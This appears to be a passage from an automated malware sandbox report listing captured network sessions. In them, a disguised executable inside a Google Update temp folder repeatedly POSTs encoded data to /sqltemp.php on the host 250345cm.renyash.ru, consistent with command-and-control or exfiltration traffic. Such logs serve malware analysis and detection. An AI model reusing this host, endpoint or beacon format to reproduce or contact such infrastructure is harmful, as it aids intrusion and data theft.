                                                                                                                  Data Ascii: SRZTQZTRXVRYV]YU[RT_U]PYZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-',& =Y'8/9S#>,[(:+)X< 4<;2<79:&Y.,Y-1
                                                                                                                  Jan 1, 2025 16:03:41.359993935 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:41.547441959 CET806INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:41 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I2woTlwtnWC7r8jbSaBqZlmQBTIyWGX9ACP%2FD2M5ACPsy1XF30dUmrWx0jkudgHTdwiPGhgkdWFa64%2BJK6h%2BA%2Bd78mhVrpZll7Uq6jlg4AObiej3wgcT313MYEbQXFVuE4uKdE7W"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365c33d5d236a-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3628&min_rtt=1929&rtt_var=4123&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=94029&cwnd=169&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  121192.168.2.662760104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:41.675725937 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:42.032387972 CET1124OUTData Raw: 56 50 5a 54 54 58 54 54 58 56 52 59 56 5f 59 5f 5b 53 54 5a 55 5b 50 5b 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VPZTTXTTXVRYV_Y_[STZU[P[Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.'?&4%$0.:)#+)(>47T#++D$?'.:&Y.,Y-9
                                                                                                                  Jan 1, 2025 16:03:42.120174885 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:42.291538954 CET796INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:42 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9IYY9sb1HjlKcGhsDgOWfOLdOMofAIJu4gunhdYsS1W69N69pKmyGHmRJzaLxX8N2j91X1ZLPoett%2Bgub1ocLR51d47kb91DuE3nHz3MvEaLyi0cRS9UzT3I6rtrqzAWmiW1NgCP"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365c7f8587d13-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2470&min_rtt=1964&rtt_var=1750&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=242565&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a
                                                                                                                  Data Ascii: 42W\X
                                                                                                                  Jan 1, 2025 16:03:42.378343105 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  122192.168.2.662761104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:42.335901022 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1936
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  123192.168.2.662762104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:42.510298967 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:42.860558033 CET1124OUTData Raw: 53 55 5f 56 51 5a 51 56 58 56 52 59 56 5e 59 57 5b 5d 54 58 55 5d 50 5a 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SU_VQZQVXVRYV^YW[]TXU]PZZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-067$+B8T4=<Y+3*#70(C%<-&Y.,Y-
                                                                                                                  Jan 1, 2025 16:03:42.959820986 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:43.130522966 CET802INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:43 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gtn34wXT3er20%2FRqtJKGsIY1Q3eyncmXfQwFZTevxb3y6cLkFFbHZ6PDVvYi2VMQYUhDL5hqw2dxVzPIO%2BgG82EJXmookGovzWotFrdOLtpGoKAlR51nPrY0174W4XfvFEd9DApC"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365cd3c2d41b4-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4353&min_rtt=1635&rtt_var=6050&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=62438&cwnd=198&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  124192.168.2.662763104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:43.258281946 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:43.610611916 CET1124OUTData Raw: 53 54 5f 5d 54 5f 54 5c 58 56 52 59 56 5f 59 54 5b 5c 54 51 55 55 50 5b 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: ST_]T_T\XVRYV_YT[\TQUUP[Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-'5Y4Y%Y'7B/##(9;W(.,] ! +]=D%?<.:&Y.,Y-9
                                                                                                                  Jan 1, 2025 16:03:43.705312014 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:43.885575056 CET808INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:43 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9k5Og3UURlEj%2FPQrEPSozAoIA00I94Qr%2FnMHsbYeyeqm0fGzXQ8535jfttcWPh295JN6dXgeLFX5L6TcsUh9GEV%2Bq38PpoR1JL9bLnJMx9iwEGtT7etd7ltxxtT%2FzP5h%2FzO3JNba"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365d1dfb20f63-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4606&min_rtt=1517&rtt_var=6748&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=55655&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  125192.168.2.662764104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:44.018285990 CET278OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 16:03:44.378343105 CET1124OUTData Raw: 56 52 5a 54 54 59 54 56 58 56 52 59 56 5a 59 57 5b 58 54 59 55 5c 50 5c 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VRZTTYTVXVRYVZYW[XTYU\P\Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-$?"4?:%.;.:!7<_?+>>$[!17X*(5$?;.&Y.,Y--
                                                                                                                  Jan 1, 2025 16:03:44.471477985 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:44.729976892 CET802INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:44 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JF9pGiatDM2tnB3f0MwvgWIV4zdpoSgR3x7dMhitmGU0jn%2B72r9WSsUw707PgnvID56JoIfj7wbQs0zX12YFUhi8cnlJrKEVSXZZKC%2FxsQoWzd30NdOWcBqcbjnJuhUC2AaSgXZE"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365d6ac068ccd-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1936&min_rtt=1899&rtt_var=787&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1402&delivery_rate=663334&cwnd=194&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  126192.168.2.662765104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:44.864994049 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:45.219928026 CET1124OUTData Raw: 53 55 5f 5d 54 5a 54 50 58 56 52 59 56 5a 59 56 5b 59 54 50 55 55 50 5d 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SU_]TZTPXVRYVZYV[YTPUUP]Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.0Y)#&'-8/\.!.'+)'S*/43<*&/7U-&Y.,Y--
                                                                                                                  Jan 1, 2025 16:03:45.307310104 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:45.482405901 CET815INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:45 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K%2FcPveT%2Bs7MLCT0%2FJ%2BnWevkyr%2FSHe2tYwDrUTgMb07v3FkTHJd51LcUvUbHaPj9o2WFfEQBke32%2BCQ%2Fpr8QingNYcmI3yK4RARWJ5zwCzA1D0PR%2BboeehlqA3REwn1VFIT0l6L1W"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365dbec0e4408-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2163&min_rtt=1662&rtt_var=1625&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=257495&cwnd=200&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  127192.168.2.662766104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:45.624072075 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:45.969851017 CET1124OUTData Raw: 56 56 5a 54 54 5d 54 56 58 56 52 59 56 5b 59 55 5b 5d 54 51 55 58 50 59 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VVZTT]TVXVRYV[YU[]TQUXPYZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-$?-X7\'X'B8:1 [/<#V)>+#2<&&Y+R,*&Y.,Y-)
                                                                                                                  Jan 1, 2025 16:03:46.070389986 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:46.335175991 CET808INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:46 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kKKWn68WSMLQWJ%2FAAc72arAhYwdsJLm3wei4CPBfyhKc%2B6gm3OLfMy0duYNpd9%2B9E4iV5%2BZ3p3MM8CV%2FRWllM73yGHh8NkHxClSz2JoBP05Dh3ueZoP1QKceEavNyW3ft6znB1rA"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365e0ae660f49-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4005&min_rtt=1733&rtt_var=5195&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=73318&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  128192.168.2.662767104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:46.474622965 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:46.829307079 CET1124OUTData Raw: 56 57 5a 53 54 51 54 55 58 56 52 59 56 5c 59 5e 5b 52 54 5e 55 54 50 59 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VWZSTQTUXVRYV\Y^[RT^UTPYZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.Z'Y5]4<!]0-?/:!>8Z())$!13[+!B%?W-:&Y.,Y-5
                                                                                                                  Jan 1, 2025 16:03:46.921832085 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:47.184758902 CET808INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:47 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sZF4eTJB5Q10ur%2FFxYJM8jvzU99Je0qVD0%2Bg16bTSxMvl6ivnMMVFJNiF8Xe1BmbS6OXV%2Fa8SKd0OFajee0oF0kbOd5Syxk9xerhTVWXD9eSBEFcMXfRLwW572OHAlVSO%2BJvyCb%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365e5fda6c338-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1799&min_rtt=1613&rtt_var=977&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=470512&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  129192.168.2.662768104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:47.321032047 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  130192.168.2.662769104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:47.399132967 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1964
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:47.751359940 CET1964OUTData Raw: 53 50 5f 53 51 5d 51 56 58 56 52 59 56 50 59 50 5b 5f 54 58 55 5e 50 59 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SP_SQ]QVXVRYVPYP[_TXU^PYZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-$4238;9-#+<_+) "\*+.1,#,*&Y.,Y-
                                                                                                                  Jan 1, 2025 16:03:47.863580942 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:48.120013952 CET958INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:48 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4bY1QbbyuuKnSuY9lwcPsCKjD5CbO1yAke1nL%2BVKYt0FXdssl1Vxd1N7MxhPKED3u237dh6ktChbY%2FIztBVbrVo1zmABVA%2Bd7yPlb4tZqIjL2pJwjodMzc%2FhRyLJYBAw%2FwBY2sgm"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365ebdecc43ad-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3071&min_rtt=1763&rtt_var=3278&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2266&delivery_rate=119359&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
